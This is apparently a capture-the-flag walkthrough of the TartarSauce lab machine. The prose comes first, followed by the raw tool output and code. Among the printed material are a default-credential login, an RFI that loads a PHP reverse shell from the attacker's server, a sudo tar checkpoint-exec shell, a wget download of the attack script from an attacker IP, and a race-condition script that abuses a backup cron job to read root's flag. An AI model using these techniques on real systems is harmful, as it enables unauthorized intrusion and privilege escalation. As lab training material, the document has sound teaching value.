It gives us a list of URLs that web robots are instructed not to visit. Only one of these links are valid.
The application is using a Content Management System (CMS) called Monstra and the version is available at the footer of the site (3.0.4). Let’s see if it has any known exploits.
The version being used is vulnerable to an authenticated RCE exploit. So we first need to find credentials.
Click on the “logged in” link and try the default credentials admin/admin.
It worked! Copy the RCE exploit into the current directory.
View the exploit.
It seems like there’s insufficient input validation on the upload files functionality that allows a malicious attacker to upload a PHP script. Let’s try doing that.
I tried a bunch of valid extensions, however, I kept getting a “File was not uploaded error”. The upload functionality does not seem to be working at all. So this is a dead end.
We need to enumerate more. Run gobuster on the webservices directory.
dir: directory mode
-w: wordlist
-l: include the length of the body in the output
-t: thread count
-e: expanded mode, print full URLs
-u: URL
-o: output file
This is a WordPress site, so let’s run wpscan on it to determine the version used and enumerate any installed plugins.
— url: the URL of the blog to scan
-e ap: enumerate all plugins
— plugins-detection aggressive: use the aggressive mode
— api-token: personal token for using wpscan
The WordPress version identified is 4.9.4. It has two plugins installed: akismet and gwolle-gb. Let’s check if the gwolle-gb plugin has any vulnerabilities.
It is vulnerable to a remote file inclusion (RFI). Copy the exploit to the current directory.
View the exploit.
The “abspath” input parameter being used in the PHP require() function is not properly validated and therefore, a malicious attacker can upload and run a malicious PHP script withe filename wp-load.php.
Shell as www-data
Get a PHP reverse shell from pentestmonkey and rename it to wp-load.php.
Start up a simple server where the shell is located.
Set up a netcat listener on the attack machine to receive the reverse shell.
Visit the following link with the correct URL to the simple server.
Let’s upgrade it to a better shell.
Privesc: www-data –> onuma
Run the following command to view the list of allowed commands the user can run using sudo without a password.
As can be seen above, we have the right to run the binary /bin/tar with onuma’s privileges.
Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
Perfect! Run the following command to get a shell running with onuma’s privileges.
Partial Privesc: onuma –> File Read as root
To view the root.txt flag, we need to escalate our privileges to root. Let’s transfer the LinEnum script from our attack machine to the target machine. In the attack machine, start up a server in the same directory that the script resides in.
I’ve never seen a service called backuperer.service before, so this must be a custom service. Let’s see if it is being run as a scheduled task. Download pspy32 and view results.
It is being run on a consistent basis. Locate the backuperer file on the target system.
View the backuperer.timer file.
Let’s breakdown what the script is doing. First, the following variables are being initialized in the script.
Then the script performs the following actions.
Recursively deletes the files/directories: /var/tmp/.* and /var/tmp/check.
Creates a gzip file of the directory /var/www/html and saves it in the file /var/tmp/.[random-sha1-value].
Sleeps for 30 seconds.
Creates the directory /var/tmp/check.
Changes to the directory /var/tmp/check and extract the gzip /var/tmp/.[random-sha1-value].
If the files in /var/www/html are different from the files in the backup it created /var/tmp/check/var/www/html, then report error. Otherwise, move file /var/tmp/.[random-sha1-value] to /var/backups/onuma-wwww-dev.bak and remove everything in the check directory and any files that start with the character “.”. Those would be the backup .[random-sha1-value] files it created.
The exploit for this is not very intuitive so bear with me as I try to explain it. When the backup is being created, the script sleeps 30 seconds before it executes the rest of the commands. We can use these 30 seconds to replace the backup tar file that the script created with our own malicious file.
After the 30 seconds pass, it will create a directory called “check” and decompress our malicious backup tar file there. Then it will go through the integrity check and fail, thereby giving us 5 minutes before the next scheduled task is run, to escalate privileges. Once the 5 minutes are up, the backuperer program is run again and our files get deleted.
The way we’re going to escalate privileges is by creating our own compressed file that contains an SUID executable. Hopefully that makes some sense. Let’s start our attack.
First, create the directory var/www/html in our attack machine. Then place the following program file in the directory.
To exploit this script, I’ll take advantage of two things: the sleep, and the recursive diff. During the sleep, I’ll unpack the archive, replace one of the files with a link to /root/root.txt, and re-archive it. Then when the script opens the archive and runs the diff, the resulting file will be different, and the contents of both files will end up in the log file.
I originally did this with a long bash one-liner, but it is easier to follow with a script:
Now, upload this to target and run it. I’ll name it .b.sh for opsec:
┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.88
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /webservices/monstra-3.0.4/: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /robots.txt: Entry '/webservices/monstra-3.0.4/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 5 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2a0e, size: 565becf5ff08d, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8072 requests: 3 error(s) and 9 item(s) reported on remote host
+ End Time: 2024-01-06 00:08:25 (GMT-5) (4970 seconds)
www-data@TartarSauce:/home$ sudo -l
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
onuma@TartarSauce:/tmp$ cat /lib/systemd/system/backuperer.timer
[Unit]
Description=Runs backuperer every 5 mins
[Timer]
# Time to wait after booting before we run first time
OnBootSec=5min
# Time between running each consecutive time
OnUnitActiveSec=5min
Unit=backuperer.service
[Install]
WantedBy=multi-user.target
The service is run every 5 minutes. Next, view backuperer binary file.
onuma@TartarSauce:/tmp$ cat /usr/sbin/backuperer
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
┌──(kali💀kali)-[~/Desktop/7. Priv Esc]
└─$ nano .b.sh
#!/bin/bash
# work out of shm
cd /dev/shm
# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
sleep 10;
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done
# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .
# get filename
fn=$(echo $cur | cut -d'/' -f4)
# extract archive
tar -zxf $fn
# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt
# remove old archive
rm $fn
# create new archive
tar czf $fn var
# put it back, and clean up
mv $fn $cur
rm $fn
rm -rf var
# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt
onuma@TartarSauce:~$ cd /dev/shm
onuma@TartarSauce:/dev/shm$ wget http://10.10.16.4:5555/.b.sh
onuma@TartarSauce:/dev/shm$ chmod +x .b.sh
onuma@TartarSauce:/dev/shm$ ./.b.sh
./.b.sh
Waiting for archive filename to change...
File changed... copying here
tar: var/www/html/webservices/monstra-3.0.4/public/uploads/.empty: Cannot stat: Permission denied
tar: Exiting with failure status due to previous errors
rm: cannot remove '.3af0e9d5f06b92fa0dd4bc929005581eb7976112': No such file or directory
rm: cannot remove 'var/www/html/webservices/monstra-3.0.4/public/uploads/.empty': Permission denied
Waiting for new logs...
Only in /var/www/html/webservices/monstra-3.0.4: robots.txt
Only in /var/www/html/webservices/monstra-3.0.4: rss.php
Only in /var/www/html/webservices/monstra-3.0.4: sitemap.xml
Only in /var/www/html/webservices/monstra-3.0.4: storage
Only in /var/www/html/webservices/monstra-3.0.4: tmp
------------------------------------------------------------------------
Integrity Check Error in backup last ran : Thu Jan 21 05:38:54 EST 2021
------------------------------------------------------------------------
/var/tmp/.379fe8e77f9f84a66b9a6df9a452d10499713829
Binary files /var/www/html/webservices/wp/.wp-config.php.swp and /var/tmp/check/var/www/html/webservices/wp/.wp-config.php.swp differ
------------------------------------------------------------------------
Integrity Check Error in backup last ran : Sat Jan 6 04:38:58 EST 2024
------------------------------------------------------------------------
/var/tmp/.3af0e9d5f06b92fa0dd4bc929005581eb7976112
diff -r /var/www/html/robots.txt /var/tmp/check/var/www/html/robots.txt
1,7c1
< User-agent: *
< Disallow: /webservices/tar/tar/source/
< Disallow: /webservices/monstra-3.0.4/
< Disallow: /webservices/easy-file-uploader/
< Disallow: /webservices/developmental/
< Disallow: /webservices/phpmyadmin/
<
---
> faa---------------------------------
Only in /var/www/html/webservices/monstra-3.0.4/public/uploads: .empty